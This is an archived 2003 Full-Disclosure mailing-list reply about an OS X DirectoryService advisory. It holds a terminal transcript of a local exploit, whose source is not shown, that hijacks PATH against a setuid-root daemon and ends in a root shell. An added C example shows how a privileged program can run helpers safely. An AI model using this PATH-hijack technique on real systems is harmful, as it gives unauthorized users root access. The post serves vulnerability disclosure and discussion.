Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv:
From: Neeko Oni (neeko@haackey.com)
Date: 04/18/03
- Previous message: Muhammad Faisal Rauf Danka: "[Full-Disclosure] Fwd: CERT Advisory CA-2003-13 Multiple Vulnerabilities in Snort Preprocessors"
- In reply to: subversive : "Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv: a041003-1}"
From: Neeko Oni <neeko@haackey.com>
To: full-disclosure@lists.netsys.com
Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)
Hoping to encourage people to figure out what @stake was talking about
in regards to the OS X DirectoryService DoS, I've attached a local
exploit for DirectoryService _once it has been crashed/killed_.
[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~#
>
> Neeko Oni wrote:
>
> >Ok, the PATH problem is self-explanatory (and has been exploited once
> >the DirectoryService process has crashed) but I've had some difficulty
> >reproducing the DoS attack claim. I've got a 10.2.4 machine sitting
> >right next to me, I believe it's a stock install, but DirectoryService
> >doesn't bind 625. DirectoryService doesn't bind any ports and
> >furthermore nothing binds 625 at all.
> >
> >Has anyone reproduced the DoS in that advisory?
>
> I also read the advisory and of the two MacOS machines that I am able
> to access (only one locally) I can confirm that on the machine that
> I don't have local access there was a daemon running on port 625 and
> as the advisory states I was able to reproduce the DoS attack. I'm
> not sure exactly which version of MacOS X that machine was running
> but the daemon did crash and refuse connection.
>
> On the machine that I know for a fact is 10.2.4 and have local access to,
> DirectoryService was setuid root and was running but there was no port
> 625 open. I haven't port scanned the machine to check other ports yet
> so I'm not ruling out the possibility it's running on a different port
> just yet.
>
> Has anyone else looked into this matter... ?
>
> -subversive
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- text/plain attachment: C program text
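
Added example, not part of the original post or its attachment: the "sh: rm: command not found" line in the transcript suggests the setuid-root daemon ran rm through a shell with the caller's PATH, and this sketch shows the defensive pattern for a privileged program that must run a helper. The function name run_helper and the SAFE_ENV table are hypothetical, and DirectoryService's own code is not shown on this page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to every helper; nothing is inherited from the
   caller. The PATH value is the stock one printed in the transcript. */
static char *const SAFE_ENV[] = {
    "PATH=/bin:/sbin:/usr/bin:/usr/sbin",
    "IFS= \t\n",
    NULL
};

/* Run abs_path with argv and SAFE_ENV. Returns the helper's exit status
   (127 if exec failed), or -1 if the path is not absolute or fork/wait failed. */
int run_helper(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                          /* never search PATH for the binary */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);   /* no shell lookup, no inherited env */
        _exit(127);                         /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed scenario: the caller sets PATH to "." as in the transcript. */
    setenv("PATH", ".", 1);
    char *const check[] = { "sh", "-c",
        "test \"$PATH\" = /bin:/sbin:/usr/bin:/usr/sbin", NULL };
    printf("helper saw fixed PATH: %s\n",
           run_helper("/bin/sh", check) == 0 ? "yes" : "no");
    char *const rel[] = { "rm", "-f", "x", NULL };
    printf("relative helper path rejected: %s\n",
           run_helper("rm", rel) == -1 ? "yes" : "no");
    return 0;
}
```
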